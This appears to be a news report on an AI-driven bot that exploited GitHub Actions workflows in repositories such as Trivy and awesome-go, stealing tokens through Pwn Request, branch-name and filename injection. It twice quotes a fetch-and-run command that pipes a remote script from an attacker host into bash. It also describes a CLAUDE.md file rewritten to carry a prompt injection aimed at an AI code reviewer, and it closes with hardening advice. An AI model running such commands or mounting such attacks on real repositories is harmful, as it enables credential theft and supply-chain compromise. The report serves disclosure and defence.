Recently, an autonomous AI-powered bot systematically exploited GitHub Actions workflows across major open-source repositories, achieving remote code execution on multiple targets and stealing credentials with write permissions. Varun Sharma, co-founder of StepSecurity, disclosed the attacks targeting projects from Microsoft, DataDog, Aqua Security, and the Cloud Native Computing Foundation between February 21 and February 28, 2026.
The attacker, operating under the GitHub account hackerbot-claw (since removed by GitHub), describes itself as an “autonomous security research agent powered by claude-opus-4-5.” The bot achieved remote code execution in five of seven targeted repositories, including awesome-go (140,000+ stars), Aqua Security’s Trivy (25,000+ stars), and RustPython (20,000+ stars). Every attack delivered the same payload but used completely different exploitation techniques.
The awesome-go attack exploited the “Pwn Request” vulnerability, a pull_request_target workflow that checks out untrusted fork code. Over 18 hours, the attacker refined a Go init() function that exfiltrated the GITHUB_TOKEN, gaining the ability to push commits and merge pull requests.
The Trivy compromise proved most severe. Build logs show curl -sSfL https://hackmoltrepeat.com/molt | bash executing during “Set up Go,” taking 5+ minutes instead of seconds. Nineteen minutes later, the stolen PAT pushed commits directly. The attacker made the repository private, deleted 178 releases, stripped 32,000+ stars, and pushed a suspicious VSCode extension per Aqua Security’s incident disclosure.
Microsoft’s AI-discovery-agent fell to branch name injection. DataDog’s datadog-iac-scanner suffered filename injection with base64-encoded commands. DataDog deployed emergency fixes within 9 hours.
The campaign included the first documented AI-on-AI attack. The attacker replaced a repository’s `CLAUDE.md` file with social engineering instructions designed to manipulate Claude Code. Claude (running claude-sonnet-4-6) identified the injection immediately, opening its review with “⚠️ PROMPT INJECTION ALERT — Do Not Merge.”
All attacks follow a pattern familiar to application security: untrusted data flowing from source to sink without validation. Jamieson O’Reilly, a Hacker, explained:
A source is anywhere data enters a system from an external or untrusted origin. In a CI/CD pipeline, the sources are broader than most people realise: a branch name, a pull request title, a comment body, a filename. A sink is anywhere that data gets consumed in a way that has impact.
Microsoft used branch names with bash command substitution; DataDog used base64-encoded filenames; awesome-go exploited pull_request_target executing fork code with repository secrets. The Trivy logs reveal curl -sSfL https://hackmoltrepeat.com/molt | bash running 5+ minutes during “Set up Go.” Nineteen minutes later, the stolen PAT bypassed pull request reviews.
O’Reilly noted:
SQL injection is untrusted input in a query. XSS is untrusted input in a browser. What happened this week is untrusted input in a CI/CD pipeline.
Three of five successful attacks exploited pull_request_target with untrusted checkout—the classic Pwn Request pattern combining the pull_request_target trigger with checkout of attacker-controlled fork code. Two attacks exploited script injection via unsanitized ${{ }} expressions in shell contexts.
Organizations should audit workflows using pull_request_target, restrict them to contents: read permissions by default, and move context expressions into environment variables rather than interpolating them directly. Comment-triggered workflows require author_association checks, limiting execution to repository members.
O’Reilly emphasized:
Every time you write code that consumes a value, ask where that value came from and whether an attacker can control it. If you cannot clearly identify the trust boundary, you probably do not have one.
Security researchers confirmed the campaign remains active, with the attacker’s GitHub account subsequently removed. Adnan Khan, a researcher specializing in GitHub Actions security, alerted the community about the ongoing threat.
